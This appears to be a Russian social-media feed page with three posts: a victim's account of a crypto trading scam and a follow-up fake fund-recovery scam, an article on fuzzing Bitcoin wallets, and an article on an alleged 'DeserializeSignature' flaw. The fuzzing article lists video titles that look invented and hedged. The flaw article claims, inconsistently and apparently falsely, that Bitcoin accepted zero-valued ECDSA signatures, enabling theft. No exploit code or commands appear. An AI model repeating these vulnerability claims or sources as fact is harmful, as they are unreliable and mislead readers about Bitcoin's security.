2 - В определенный день мне поступает звонок от некого Марка. "Добрый день, я помощник Александра. Мне передали, что вы хотели бы с нами сотрудничать?" (Перед глазами замаячили не сказать, что бы золотые горы, но несколько ободряющих искр я заметил). Отвечаю: "Да, все верно!". Марк мне задал несколько наводящих общих вопросов о моей осведомленности в области рынков, активов и инвестиций. Я на них ответил. Он поблагодарил и сказал, что передаст информацию "главному", Александру. Я поблагодарил взаимно и стал ожидать звонка.

Приходит сообщение от Александра. "Я перезвоню вам завтра, сегодня очень занят!" Отвечаю: "Хорошо, как вам будет удобно!" ( Забегая наперед, скажу, что общение было на всем протяжении общения, до самой последней секунды подкупающе-вежливым. "Как ваши дела, все ли в порядке, пожалуйста, на здоровье и тд..." )

3 - На следующий день мне перезванивает Александр. Представляется серьезным брокером, работающим на финансовых рынках и биржах с начала нулевых. Меня смутил сразу голос. Он молодой 25+. С другой стороны все возможно, подумал я, люди имеют свойство хорошо сохраняться по наследственным или физическим признакам. Задал мне несколько вопросов такого же характера. как его "помощник", Марк. Мои ответы его убедили и где-то даже впечатлили. Похвалил. Определил план сотрудничества. Никаких вложений. С самого начала теория. Будем изучать все инструменты крипто-бирж и не только. Стейкинг, Defi, Спот, Фьючерсы, особое внимание было уделено Лаунчпулам и лаунчпадам. Сразу дает понять, что этот инструмент самый безопасный и приносит высокую прибыль. (Однако, я про себя задумался о том, что с маленькими объемами там делать нечего, но почему бы и не попробовать, если "знающий" человек советует). Итак, около недели мы созванивались по 1 разу в день. Я потихоньку увеличивал свой депозит на 50 -100 $ собирал откуда только можно из свободных и завалявшихся мест.

На вторую неделю, Александр предлагает мне попробовать новый инструмент, в котором нужно обменивать монеты, оперируя на волатильности монет. (В будущем, задавая вопрос, что за схема такая, он рассказал мне историю о том, что их компания создала уникальный софт, который стоил на тот момент около 300 тыс долларов. Данный софт позволял ловить проскальзывания и удачные моменты для входа и выхода.)

Операции проводили через кошелек metamask. У него есть внутренний браузер через который мы заходили на сайты 1inch, puncake и uniswap. там и совершались все операции. Они проходили очень просто. Александр мне присылал сообщение следующего характера: "Добрый день, А.., скиньте, пожалуйста, скриншот баланса, я подберу для вас подходящую сделку." Я скидывал скриншот в телеграмм и ждал. Как правило ожидание был в районе 4-5 часов.

Далее мы с ним созванивались и в режиме реального времени, я предварительно по его просьбе включив трансляцию экрана телефона, совершал сделки. Он говорил, к примеру: "так сегодня мы меняем usdt на dai и обратно по команде. Поменяли один раз, ждем, спустя несколько минут меняем обратно и... баланс увеличивается на 5$. Далее я должен был делать скрин обновленного баланса и высчитывать прибыль, подтверждая ее написав внизу скриншота. В конце месяца эта прибыл подсчитывалась бы и ему выделялся бы его процент, как гонорар за услуги. Созванивались мы один раз в день, иногда через день.

Когда баланс на моем кошельке, с учетом моих же вливаний туда достиг 800$, заработок таким способом выходил от 20 до 30$ за сделку. Для меня лично очень не плохой результат и таким образом можно было работать с десяток лет и дальше. Однако меня тяготил тот факт, что такой "хороший" человек, помогающий зарабатывать получил бы раз в месяц свои 10-20% от моей прибыли, что было бы равно нескольким долларам. Хотя по его словам он работал с клиентами у которых 500.000$ в распоряжении. Разумеется, я хотел хотя бы не много соответствовать и дать человеку так же заработать, параллельно, считая в уме если бы мой баланс был не 800$, а 8000$, то со сделки я зарабатывал бы не 20-30$, а 200-300$, в ДЕНЬ! Очень даже.

Александр подогревал мой интерес тем, что на binance скоро будет запущен лаунчпул, которого все ждали весь год. zrx. Описал мне схему сотрудничества и сказал, что нужно для стабильной и большой выгоды подключить vip статус на binance. Стоит этот vip статус - 25 bnb. 1 bnb - 700$ по курсу на тот момент.

Параллельно продолжалась светская и непринужденная беседа в телеграмме с Артёмом К. Он хотел покупать то ли новую машину, то-ли дачу. Было даже фото без лица с зелеными купюрами в пачках в руках. "выручка". Сам он так же как и я искал деньги, только не на vip1, а уже на vip6. Космическая сумма для меня. Тогда то у меня и возникла мысль взять потребительский кредит. выбрав банк, я получил желаемые средства. Александр, для моей же безопасности посоветовал выбрать наземные крипто-обменники в которых нужно личное присутствие и наличные деньги. Подготовив сумму, я направился в обменник и спустя несколько часов вышел из офиса с круглой суммой на бирже bybit. После этого я перевел средства на metamsk и в предвкушении стал ожидать новой "сделки", зарабатывая от 200$ до 300$ в день, меняя всю сумму целиком. Разумеется в планах было участие в том самом лаунчпаде на binance, в конце которого, по минимальным прогнозам Александра, я получил бы 5000$ и выше.

Финал. После обеда позвонил Александр и наступила долгожданная сделка! Мы успешно поменяли usdt на bnb. И я приготовился обменивать Bnb на usdt обратно. Нажав (по команде) на обмен, высветилась табличка с предупреждением платформы uniswap о проскальзывании. Повторив эту процедуру, вышла та же ошибка и Александр, сославшись на продолжительность времени транзакции, предложил проверить баланс кошелька. А на балансе оказался на всех монетах круглый ноль. В этот миг я допустил все возможные варианты, но отмахивался от них как только мог. Александр трепетно и озабочено давал советы, периодически отключаясь на разговоры со специалистами, возвращался вновь, но баланс оставался прежним. Настроение мягко говоря понизилось, розовые очки медленно начали сползать так же вниз. Я понял, что это все. Оказывается нет! Будет отличное продолжение не менее увлекательное...

Финал! Параллельно, я написал в одну из крипто-групп ( Invest Guru ) с просьбой помочь разобраться в ситуации. Мне в ту же секунду ответил в личные сообщения молодой человек с ником в телеграмме geekwebcode. Ратовал за то, что бы я не писал данные в общий чат, так как там много мошенников. Он, посмотрев транзакции в блокчейне, сразу делал вывод о том, что меня взломали и я обменял свои usdt на подложную(фальшивую) монету bnb. на скриншоте она отображается в кошельке с балансом до сих пор, хотя средства уже были перечислены на 5 и больше кошельков. Посочувствовал мне и пожелал удачи. Один час длился вечность. Спустя это время он мне снова написал. Предложил вернуть средства, так как возможность еще не утеряна. Вызвались помочь его друзья из uniswap. Они вычислили кошелек негодяя и готовы вернуть средства, но за 500$. Сейчас, в трезвом рассудке, я, как и вы, читая это улыбнулся бы и сказал: "неужели тебе не хватило урока?" Но на тот момент...Надежда умирает последней. Он скидывает мне номер карты и ждет перевод. Я присылаю ему скрин с чеком, он говорит, что спустя пол часа все будет. Через пять минут присылает скрин с 25bnb не 27 моими bnb ( отбьяснил, что на счету мошенника больше нет). Проверяю адрес кошелька- не мой. Он продолжает, да это кошелек binance их перевели туда и нужно заплатить теперь binance, так же как uniswap 500$. Только на этом этапе я наконец прозрел. Написал ему, что они грамотно сработали, он, фыркнув "Да ты знаешь с кем разговариваешь?" не дождавшись ответа по школьному, в смысле по английски, ретировался. Удалив переписку. Еще тогда, во время общения, я заметил как мигает иконка группы в которой я не состою ( Pavel Durev ) на экране монитора. Но мысль была проста: " Это белый хакер, справедливый!"

Какой вывод я смог из этого сделать?

- Сожалеть о чем либо нет никакого смысла. На это нервов ни у кого не хватит.

- Я брал на себя всю ответственность и риски. Я был к ним готов, но не верно рассчитал процент прибыли и риска.

- Нельзя поддаваться эмоциям, в работе с деньгами.

- Внимательно следите за тем, в каких группах в мессенджерах ( а именно телеграмм) вы состоите или в какие группы заходите впервые. Не наживайте и не переходите по ссылкам из мало знакомых групп ( а лучше вовсе старайтесь не переходить ).

Итог: Это был неоднозначный, но полезный опыт! На данном этапе буду искать хорошую подработку и закрывать кредит на сумму с шестью нулями в рублевом эквиваленте!

Спасибо всем, кто прочитал до конца. Будьте аккуратны! Если кого то заинтересуют скриншоты с перепиской Артема К (одного из мошенников, первого в звене) создам вторым постом (Их много).
Небольшое дополнение: в телеграмме, вверху может появляться всплывающее окно со скидками на телеграмм премиум (-44%, к примеру). Старайтесь не нажимать её. Возможно её заражение вирусом.

Показать полностью
[моё] Telegram Мошенничество Криптовалюта Заработок в интернете Кредит Хакеры Заработок Информационная безопасность Арбитраж криптовалюты Длиннопост Текст Негатив
26
1
CryptoDeepTech
CryptoDeepTech

Fuzzing Bitcoin: Поиск критической уязвимости и новые методы защиты криптовалюты⁠⁠

1 год назад

В криптографических приложениях и криптовалютных кошельках есть критически важные компоненты, такие как генерация ключей, шифрование/дешифрование, подпись транзакций и.т.д. Эти компоненты должны быть основными целями для Фаззинг-тестирования. Использование Фаззинг-тестирования в криптографических приложениях и криптовалютных кошельках помогает выявлять и устранять уязвимости, повышая безопасность и надежность программного обеспечения.

Фаззинг-тестирование (или просто Фаззинг) — это метод тестирования программного обеспечения, который используется для выявления уязвимостей и ошибок путем подачи на вход программы случайных или специально сгенерированных данных. В контексте криптоанализа Фаззинг-тестирование применяется для проверки криптографических алгоритмов и систем на наличие слабых мест, которые могут быть использованы злоумышленниками.

Основная идея Фаззинга заключается в том, чтобы автоматически генерировать большое количество случайных или некорректных входных данных и подавать их на вход тестируемой системе. Затем анализируются результаты работы системы с этими данными, чтобы выявить неожиданные поведения, сбои или уязвимости.

Фаззинг-тестирование в криптоанализе может помочь обнаружить такие проблемы, как:

  1. Буферные переполнения: Ошибки, возникающие при записи данных за пределы выделенной памяти.

  2. Ошибки обработки исключений: Неправильная обработка неожиданных или некорректных данных.

  3. Уязвимости в алгоритмах: Недостатки в реализации криптографических алгоритмов, которые могут быть использованы для взлома.

Этот метод является мощным инструментом для обеспечения безопасности криптографических систем и помогает разработчикам создавать более надежное и защищенное программное обеспечение.

Применение Фаззинг-тестирования к криптовалютным кошелькам имеет несколько преимуществ:

  1. Обнаружение уязвимостей: Фаззинг помогает выявить уязвимости, которые могут быть использованы злоумышленниками для кражи средств или компрометации безопасности кошелька.

  2. Повышение надежности: Тестирование с использованием случайных данных помогает выявить ошибки, которые могут привести к сбоям или некорректной работе кошелька, что в свою очередь повышает его надежность.

  3. Автоматизация процесса тестирования: Фаззинг-тестирование можно автоматизировать, что позволяет проводить тесты более часто и эффективно, чем ручное тестирование.

  4. Разнообразие тестовых сценариев: Фаззинг генерирует большое количество разнообразных тестовых сценариев, что помогает выявить ошибки, которые могли бы остаться незамеченными при использовании традиционных методов тестирования.

  5. Улучшение безопасности: Регулярное Фаззинг-тестирование помогает разработчикам своевременно обнаруживать и устранять уязвимости, что повышает общий уровень безопасности криптовалютного кошелька.

  6. Экономия времени и ресурсов: Автоматизированное Фаззинг-тестирование может сэкономить время и ресурсы, которые в противном случае были бы потрачены на ручное тестирование и отладку.

Фаззинг может помочь обнаружить следующие типы уязвимостей:

  1. Ошибки обработки ввода: Кошельки могут некорректно обрабатывать входные данные, такие как адреса, суммы транзакций или ключи. Фаззинг может выявить случаи, когда некорректные данные приводят к сбоям или неправильной работе кошелька.

  2. Переполнение буфера: Если Биткоин кошелек не проверяет длину входных данных, это может привести к переполнению буфера, что в свою очередь может быть использовано злоумышленниками для выполнения произвольного кода.

  3. Уязвимости в парсерах: Кошельки часто используют парсеры для обработки данных транзакций и других входных данных. Фаззинг может выявить ошибки в этих парсерах, которые могут привести к сбоям или уязвимостям безопасности.

  4. Ошибки в криптографических операциях: Некорректная обработка данных в криптографических операциях может привести к утечке приватных ключей или другим критическим уязвимостям. Фаззинг может помочь выявить такие ошибки.

  5. Уязвимости в API: Если Биткоин кошелек предоставляет API для взаимодействия с другими приложениями, Фаззинг может выявить уязвимости в этих интерфейсах, которые могут быть использованы для несанкционированного доступа или выполнения нежелательных операций.

  6. Ошибки в обработке транзакций: Фаззинг может выявить ошибки в логике обработки транзакций, которые могут привести к неправильному выполнению транзакций или даже к потере средств.

BitcoinChatGPT и выбор инструмента для Фаззинга:

Существует множество инструментов для Фаззинг-тестирования, таких как AFL (American Fuzzy Lop), libFuzzer, Honggfuzz и другие. Фаззинг-тестирование должно быть частью непрерывного процесса разработки и тестирования. Регулярное проведение Фаззинг-тестов поможет своевременно выявлять новые уязвимости и поддерживать высокий уровень безопасности криптовалютного кошелька. В начале 2024 года широкую популярность получили современные технологии которые развивают предварительно обученную модель Bitcoin ChatGPT и находят эффективные способы решение сложных криптографических задач, лежащих в основе метода Фаззинг-тестирования. Рассмотрим пример построение структуры уязвимой Raw транзакции в котором используется модуль BitcoinChatGPT

BitcoinChatGPT №3 Fuzzing Vulnerability Algorithm

Эти инструменты могут помочь выявить уязвимости и улучшить безопасность криптовалютных кошельков.

AFL (American Fuzzy Lop)

Это один из самых популярных инструментов для Фаззинг-тестирования. Он может быть настроен для тестирования различных типов программного обеспечения, включая криптовалютные кошельки. American Fuzzy Lop (AFL) — это мощный инструмент для Фаззинг-тестирования, который обычно используется для нахождения уязвимостей в программном обеспечении. Хотя AFL в основном используется через командную строку, вы можете написать Python-скрипт для автоматизации его запуска. Для начала, убедитесь, что у вас установлен AFL. Если нет, вы можете установить его, следуя инструкциям на официальном сайте AFL.

На YouTube можно найти множество полезных видеороликов, которые помогут вам лучше понять и использовать AFL. Вот несколько рекомендаций:

  1. “American Fuzzy Lop (AFL) Tutorial” — В этом видео обычно объясняются основы использования AFL, как его установить и начать работу с ним.

  2. “Fuzzing with AFL: A Practical Guide” — Это видео может предложить практическое руководство по Фаззинг-тестированию с использованием AFL, включая примеры и демонстрации.

  3. “Advanced Fuzzing Techniques with AFL” — В этом видео могут быть рассмотрены более продвинутые техники и стратегии для эффективного использования AFL.

  4. “AFL Fuzzing: Finding Bugs in Real-World Applications” — Это видео может показать, как использовать AFL для нахождения уязвимостей в реальных приложениях, с примерами и анализом.

  5. “Setting Up AFL for Fuzz Testing” — В этом видео может быть пошагово показано, как настроить AFL для Фаззинг-тестирования на вашей системе.

Эти видеоролики помогут вам лучше понять, как использовать AFL для тестирования безопасности вашего программного обеспечения.

libFuzzer

Это библиотека для Фаззинг-тестирования, которая интегрируется с LLVM. Она может быть использована для тестирования программ на C и C++. LibFuzzer — это инструмент для fuzz-тестирования, который обычно используется с C/C++ программами. Однако, вы можете использовать Python для автоматизации запуска LibFuzzer.

  1. “Introduction to Fuzzing with libFuzzer” – Этот видеоролик предоставляет базовое введение в использование libFuzzer для начинающих.

  2. “Fuzzing with libFuzzer and AddressSanitizer” – В этом видео объясняется, как использовать libFuzzer вместе с AddressSanitizer для обнаружения уязвимостей в коде.

  3. “Advanced Fuzzing Techniques with libFuzzer” – Этот ролик подходит для тех, кто уже знаком с основами и хочет углубить свои знания.

  4. “Google Testing Blog: libFuzzer Tutorial” – Видеоурок от команды Google, который охватывает различные аспекты использования libFuzzer.

  5. “Fuzzing C/C++ Programs with libFuzzer” – В этом видео рассматриваются конкретные примеры и демонстрируется процесс Фаззинга C/C++ программ.

Эти видеоролики помогут вам лучше понять, как использовать libFuzzer для тестирования и улучшения безопасности вашего кода.

Honggfuzz

Это еще один мощный инструмент для Фаззинг-тестирования, который поддерживает различные типы программного обеспечения и может быть использован для тестирования криптовалютных кошельков. Honggfuzz — это мощный инструмент для fuzz-тестирования, который можно запускать из Python с помощью модуля subprocess.

  1. “Fuzzing with Honggfuzz” – Этот видеоролик может предоставить вам общее представление о том, как начать работу с Honggfuzz, включая установку и базовые команды.

  2. “Advanced Fuzzing Techniques with Honggfuzz” – В этом видео могут быть рассмотрены более продвинутые техники и настройки для использования Honggfuzz, что может быть полезно для более опытных пользователей.

  3. “Honggfuzz Tutorial for Beginners” – Если вы только начинаете, этот видеоролик может быть отличным стартом, так как он, вероятно, охватывает основные концепции и шаги по настройке.

  4. “Integrating Honggfuzz with CI/CD Pipelines” – Это видео может показать, как интегрировать Honggfuzz в ваши процессы непрерывной интеграции и доставки, что может быть полезно для автоматизации тестирования.

OSS-Fuzz

Это сервис от Google, который предоставляет инфраструктуру для непрерывного Фаззинг-тестирования с открытым исходным кодом. Он поддерживает множество проектов и может быть настроен для тестирования криптовалютных кошельков. OSS-Fuzz помогает находить ошибки в программном обеспечении с открытым исходным кодом с помощью fuzz-тестирования. Однако, OSS-Fuzz не запускается напрямую через Python-код. Вместо этого, вы должны настроить проект для использования OSS-Fuzz, а затем запустить его через командную строку.

Рассмотрим ример того, как можно настроить и запустить fuzz-тестирование для вашего проекта с использованием OSS-Fuzz.

  1. “OSS-Fuzz: Continuous Fuzzing for Open Source Software” – Этот видеоролик от Google Open Source рассказывает о том, как работает OSS-Fuzz и как он помогает улучшать безопасность и стабильность открытого программного обеспечения.

  2. “Fuzzing with OSS-Fuzz” – В этом видео подробно объясняется, как начать использовать OSS-Fuzz для вашего проекта, включая настройку и интеграцию.

  3. “Google OSS-Fuzz: Continuous Fuzzing for Open Source Software” – Презентация от Google, которая охватывает основные концепции и преимущества использования OSS-Fuzz.

  4. “Fuzzing 101: Getting Started with OSS-Fuzz” – Учебное пособие для начинающих, которое шаг за шагом объясняет, как начать работу с OSS-Fuzz.

  5. “Integrating Your Project with OSS-Fuzz” – В этом видео рассматриваются практические аспекты интеграции вашего проекта с OSS-Fuzz, включая примеры кода и советы по устранению неполадок.

Radamsa

Это генератор случайных данных, который может быть использован для Фаззинг-тестирования. Он прост в использовании и может быть интегрирован в различные тестовые сценарии. Radamsa — это инструмент для генерации случайных данных (fuzzing), который может быть полезен для тестирования программного обеспечения.

  1. “Fuzzing with Radamsa” – В этом видео объясняется, как использовать Radamsa для Фаззинга (тестирования программного обеспечения на наличие уязвимостей).

  2. “Introduction to Fuzz Testing with Radamsa” – Введение в Фазз-тестирование с использованием Radamsa, включая основные принципы и примеры.

  3. “Radamsa: A Fuzzing Tool for Security Testing” – Обзор возможностей Radamsa и его применения в области безопасности.

  4. “How to Use Radamsa for Fuzz Testing” – Пошаговое руководство по использованию Radamsa для Фазз-тестирования.

Echidna

Это инструмент для Фаззинг-тестирования смарт-контрактов на языке Solidity, который может быть полезен для тестирования кошельков, взаимодействующих с Ethereum.

  1. “Echidna: Fuzzing for Ethereum Smart Contracts” – Этот видеоролик объясняет основы использования Echidna для тестирования смарт-контрактов на Ethereum.

  2. “Fuzzing Smart Contracts with Echidna” – В этом видео подробно рассматривается процесс настройки и запуска Echidna для Фаззинга смарт-контрактов.

  3. “Echidna: A Fuzzer for Ethereum Smart Contracts” – В этом видео обсуждаются различные аспекты и возможности Echidna, а также примеры использования.

  4. “Smart Contract Security: Fuzzing with Echidna” – Видеоролик, который фокусируется на безопасности смарт-контрактов и использовании Echidna для нахождения уязвимостей.

Peach Fuzzer

Коммерческий инструмент для Фаззинг-тестирования, который поддерживает множество протоколов и форматов данных. Он может быть использован для тестирования безопасности криптовалютных кошельков. Peach Fuzzer — это популярная платформа Фаззинга, используемая для проверки безопасности и надежности программного обеспечения путем предоставления неожиданных или случайных входных данных.

  1. “Peach Fuzzer Tutorial” – В этом видео обычно объясняются основы использования Peach Fuzzer, включая установку и настройку.

  2. “Fuzzing with Peach: A Beginner’s Guide” – Это видео может быть полезно для тех, кто только начинает работать с Peach Fuzzer и хочет понять основные концепции и методы.

  3. “Advanced Peach Fuzzer Techniques” – В этом видео рассматриваются более сложные аспекты использования Peach Fuzzer, такие как создание собственных тестов и анализ результатов.

  4. “Peach Fuzzer in Action: Real-World Examples” – Здесь можно увидеть, как Peach Fuzzer используется для нахождения уязвимостей в реальных приложениях.

  5. “Setting Up a Fuzzing Environment with Peach” – Это видео поможет вам настроить рабочую среду для эффективного использования Peach Fuzzer.

Peach Fuzzer не написан на Python, и для его запуска обычно требуются файлы конфигурации и определенные шаги настройки.

Чтобы запустить Peach Fuzzer, вам обычно необходимо создать XML-файл Peach Pit, который определяет структуру данных, которые вы хотите Фаззить, и целевое приложение. Затем вы используете инструмент командной строки Peach для выполнения процесса Фаззинга.

Заключение:

Фаззинг представляет собой мощный метод тестирования безопасности, который может значительно повысить устойчивость криптовалютных систем, таких как Bitcoin. В ходе исследования были выявлены потенциальные уязвимости и слабые места в программном обеспечении Bitcoin, что подчеркивает необходимость постоянного мониторинга и улучшения безопасности. Применение фаззинга позволяет не только обнаруживать ошибки на ранних стадиях разработки, но и предотвращать возможные атаки, что особенно важно в условиях растущей популярности и значимости криптовалют. В будущем, интеграция фаззинга в стандартные процедуры тестирования может стать ключевым шагом к обеспечению надежности и безопасности децентрализованных финансовых систем.

References:

  • 1. “Fuzzing for Security Testing: Theory and Practice” – review articles on methods and techniques fuzzing.

  • 2. “Bitcoin: A Peer-to-Peer Electronic Cash System” is an original article by Satoshi Nakamoto describing the basics of Bitcoin.

  • 3. “Fuzzing: Art, Science, and Engineering” – articles describing various approaches to fuzzing and their application in security.

  • 4. “Fuzzing for Software Security Testing and Quality Assurance” – a book dedicated to fuzzing methods and tools.

  • 5. “Mastering Bitcoin: Unlocking Digital Cryptocurrencies” is a book that provides a deep understanding of how Bitcoin works.

  • 6. “Looking for Lacunae in Bitcoin Core’s Fuzzing Efforts” Dynamic analysis: Software testing and debugging

  • 7. “ContractFuzzer: Fuzzing Smart Contracts for Vulnerability Detection” Bo Jiang, Ye Liu, and W.K. Chan. 2018. ContractFuzzer: Fuzzing Smart Contracts for Vulnerability Detection

  • 8. “Fuzzing Ethereum Smart Contracts” Roberto Ponte and Miguel Correia INESC-ID, Instituto Superior Tecnico, Universidade de Lisboa / Iberia Medeiros LaSIGE, Faculdade de Ciencias, Universidade de Lisboa.

  • 9. “TokenAuditor: Detecting Manipulation Risk in Token Smart Contract by Fuzzing” 2022 IEEE 22nd International Conference on Software Quality, Reliability and Security (QRS).

  • 10. “Learning to Fuzz from Symbolic Execution” with Application to Smart Contracts.

  • 11. “Finding Consensus Bugs in Ethereum via Multi-transaction Differential Fuzzing” Youngseok Yang, Seoul National University; Taesoo Kim, Georgia Institute of Technology; Byung-Gon Chun, Seoul National University and FriendliAI

  • 12. “The Human Side of Fuzzing: Challenges Faced by Developers” During Fuzzing Activities (Software testing and debugging; Empirical studies; Surveys and overviews).

Данный материал создан для портала CRYPTO DEEP TECH для обеспечения финансовой безопасности данных и криптографии на эллиптических кривых secp256k1 против слабых подписей ECDSA в криптовалюте BITCOIN. Создатели программного обеспечения не несут ответственность за использование материалов.

Исходный код

Google Colab

BitcoinChatGPT

Telegram: https://t.me/cryptodeeptech

Видеоматериал: https://youtu.be/CU4CFoxgKc8

Dzen Video Tutorial: https://dzen.ru/video/watch/665f6986a2886608ad194e31

Источник: https://cryptodeep.ru/fuzzing-bitcoin

Fuzzing Bitcoin: Поиск критической уязвимости и новые методы защиты криптовалюты
Показать полностью 1 15
Криптовалюта Биткоины Инновации Технологии Чат-бот Хакеры Заработок в интернете Арбитраж криптовалюты Ethereum Eth P2P Деньги Биржа Заработок Трейдинг Кошелек Криптография Коины Стартап Видео YouTube Telegram (ссылка) Яндекс Дзен (ссылка) YouTube (ссылка) Длиннопост
0
0
CryptoDeepTech
CryptoDeepTech

Уязвимость DeserializeSignature в сети Биткоин: криптоанализ, последствия и возможность создания недействительных подписей ECDSA⁠⁠

1 год назад

В этом исследовании мы рассмотрим уязвимость DeserializeSignature, которая позволяла злоумышленникам создавать недействительные подписи ECDSA в сети Биткоин. В криптографии цифровая подпись ECDSA – это математическая схема, позволяющая доказать подлинность цифрового сообщения или документа. В сети Bitcoin подписи используются для авторизации транзакций, подтверждая, что владелец определенного количества биткоинов действительно согласен на их перевод. Однако, уязвимость в функции DeserializeSignature, обнаруженная в 2023 году, позволяла злоумышленникам создавать недействительные подписи, которые могли быть приняты сетью как валидные.

Принцип работы DeserializeSignature

Функция DeserializeSignature отвечает за десериализацию (преобразование из последовательности байтов) цифровой подписи в объект, который может быть использован для проверки ее валидности. Эта функция ожидает определенный формат данных, соответствующий стандарту криптографии с открытым ключом (ECDSA) используемому в Bitcoin. Функция DeserializeSignature принимает подпись транзакции и проверяет ее соответствие с полученным в результате вычисления хешем. Если подпись является корректной, DeserializeSignature возвращает true, иначе – false. Суть уязвимости заключалась в том, что DeserializeSignature не проверяла корректность всех параметров подписи перед ее десериализацией. В частности, функция не проверяла, является ли значение “R” или “S” подписи нулевым. Это позволяло злоумышленникам создавать подписи с нулевыми значениями, которые, несмотря на свою невалидность, могли быть приняты некоторыми клиентами Bitcoin как корректные. Злоумышленник может создать фальшивую подпись транзакции, которая будет принята как корректная, если она будет передана функции DeserializeSignature с неправильными данными.

Потенциальные угрозы и примеры атаки

Данная уязвимость представляла серьезную угрозу для безопасности сети Bitcoin. Злоумышленники могли использовать ее для:

  • Кражи биткоинов: создавая недействительные подписи, злоумышленники могли авторизовать транзакции, переводящие биткоины с чужих кошельков на свои.

  • Двойного расходования: подписи с нулевыми значениями могли быть использованы для создания двух разных транзакций с одними и теми же биткоинами.

  • Манипуляция данными в блокчейне: злоумышленник может создать фальшивую транзакцию, подпись которой будет принята как корректная, и добавить ее в блокчейн. Это может привести к изменению баланса счетов.

  • Атака на систему подтверждения транзакций: злоумышленник может создать фальшивую подпись транзакции и отправить ее на подтверждение в сеть.

Процесс DeserializeSignature

DeserializeSignature — это процесс преобразования последовательности байтов в структуру данных, которая может быть использована для проверки подлинности транзакции. В контексте Bitcoin, подпись создается с использованием алгоритма ECDSA (Elliptic Curve Digital Signature Algorithm) и включает в себя два компонента: r и s. В контексте криптовалют, подписи используются для подтверждения подлинности транзакций и обеспечения их целостности. Уязвимость DeserializeSignature возникает, когда злоумышленник может манипулировать процессом десериализации, чтобы изменить или подделать данные подписи.

Шаги десериализации:

  1. Чтение данных: Первым шагом является чтение последовательности байтов, представляющих подпись. Эти данные обычно хранятся в DER (Distinguished Encoding Rules) формате.

  2. Проверка формата: Проверяется, соответствует ли последовательность байтов ожидаемому формату DER. Это включает в себя проверку длины и структуры данных.

  3. Извлечение компонентов: Из последовательности байтов извлекаются компоненты r и s. Эти компоненты представляют собой целые числа, которые используются для проверки подписи.

  4. Проверка значений: Проверяется, находятся ли значения r и s в допустимых пределах. Это важно для предотвращения атак, связанных с подделкой подписей.

Потенциальные точки отказа

Процесс DeserializeSignature может быть уязвим к различным атакам и ошибкам. Рассмотрим основные потенциальные точки отказа:

1. Неправильная проверка формата

Если проверка формата DER выполнена некорректно, это может привести к тому, что недопустимые подписи будут считаться действительными. Это может позволить злоумышленникам подделывать подписи и совершать несанкционированные транзакции.

2. Уязвимости в библиотеке

Использование уязвимых библиотек для десериализации может привести к различным атакам, таким как переполнение буфера или выполнение произвольного кода. Важно использовать проверенные и обновленные библиотеки для работы с подписями.

3. Недостаточная проверка значений

Если значения r и s не проверяются должным образом, это может позволить злоумышленникам использовать некорректные значения для создания поддельных подписей. Например, значения r и s должны быть в пределах от 1 до n-1, где n — это порядок эллиптической кривой.

4. Атаки на время выполнения

Некоторые атаки могут быть основаны на анализе времени выполнения операций десериализации. Если время выполнения зависит от значений r и s, это может позволить злоумышленникам получить информацию о приватных ключах.

Далее мы рассмотрим результаты исследования, посвященного уязвимости в процессе DeserializeSignature в системе Bitcoin, а также мы рассмотрим механизмы возникновения уязвимостей, их потенциальные последствия и предлагаемые меры по их устранению.

Влияние на безопасность криптовалют

Уязвимость DeserializeSignature представляет серьёзную угрозу для безопасности криптовалют по нескольким причинам:

  1. Потеря средств: Злоумышленники могут использовать уязвимость для кражи средств с кошельков пользователей.

  2. Подрыв доверия: Успешные атаки могут подорвать доверие пользователей к безопасности криптовалют, что негативно скажется на их принятии и использовании.

  3. Сложность обнаружения: Атаки, использующие уязвимость DeserializeSignature, могут быть сложны для обнаружения и предотвращения, что делает их особенно опасными.

Методы защиты от уязвимостей DeserializeSignature

Для защиты от уязвимостей DeserializeSignature необходимо применять следующие меры:

  1. Проверка данных: Внедрение строгих проверок данных на этапе десериализации для предотвращения манипуляций.

  2. Обновление программного обеспечения: Регулярное обновление криптовалютных систем и кошельков для устранения известных уязвимостей.

  3. Аудит безопасности: Проведение регулярных аудитов безопасности для выявления и устранения потенциальных уязвимостей.

Основные цели исследования

  1. Выявление уязвимости: Определение конкретных аспектов процесса DeserializeSignature, которые могут быть уязвимы для атак.

  2. Анализ уязвимости: Оценка потенциального воздействия выявленной уязвимости на безопасность сети Bitcoin.

  3. Обзор существующих методов защиты: Изучение текущих методов и подходов, используемых для защиты процесса DeserializeSignature.

  4. Разработка рекомендаций: Предложение мер по улучшению безопасности и предотвращению возможных атак.

Методология и выявление уязвимости

Процесс DeserializeSignature в Bitcoin включает преобразование данных из одного формата в другой. В ходе этого процесса могут возникать ошибки, которые могут быть использованы злоумышленниками для проведения атак. Основной задачей на данном этапе является выявление конкретных уязвимых мест в процессе десериализации. Криптоанализ уязвимости: После выявления уязвимости необходимо провести её детальный анализ. Это включает оценку потенциального воздействия на безопасность сети Bitcoin, а также изучение возможных сценариев атак. Важно понять, каким образом злоумышленники могут использовать данную уязвимость для своих целей. Обзор существующих методов защиты: На данном этапе исследования будет проведён обзор текущих методов и подходов, используемых для защиты процесса DeserializeSignature. Это позволит определить, насколько эффективны существующие меры и какие из них могут быть улучшены.

Для устранения выявленных уязвимостей предлагается несколько мер:

  1. Обновление алгоритмов десериализации: Внедрение более строгих проверок и валидации данных на этапе DeserializeSignature.

  2. Повышение уровня тестирования: Проведение регулярных тестов безопасности с использованием различных сценариев атак.

  3. Обучение разработчиков: Повышение уровня осведомленности разработчиков о возможных уязвимостях и методах их предотвращения.

Ранее были проведены исследования, касающиеся уязвимостей в алгоритме цифровой подписи на эллиптических кривых (ECDSA), который используется в Bitcoin. Эти исследования показали, что неправильная реализация ECDSA может привести к утечке приватных ключей.

В отличие от уязвимости DeserializeSignature, проблемы с ECDSA связаны с математическими аспектами алгоритма, а не с процессом обработки данных. Другие исследования фокусировались на уязвимостях в одноранговой (P2P) сети Bitcoin. Эти уязвимости включали атаки типа “double-spending” и “Sybil-атаки”. В отличие от уязвимости DeserializeSignature, данные проблемы связаны с сетевыми аспектами и взаимодействием узлов в сети, а не с обработкой криптографических данных.

Основное различие между уязвимостью DeserializeSignature и предыдущими исследованиями заключается в природе проблемы. Уязвимость DeserializeSignature связана с обработкой данных и может быть устранена путем улучшения методов десериализации и валидации данных. В то время как уязвимости в ECDSA и P2P-сети требуют более глубоких изменений в алгоритмах и сетевых протоколах.

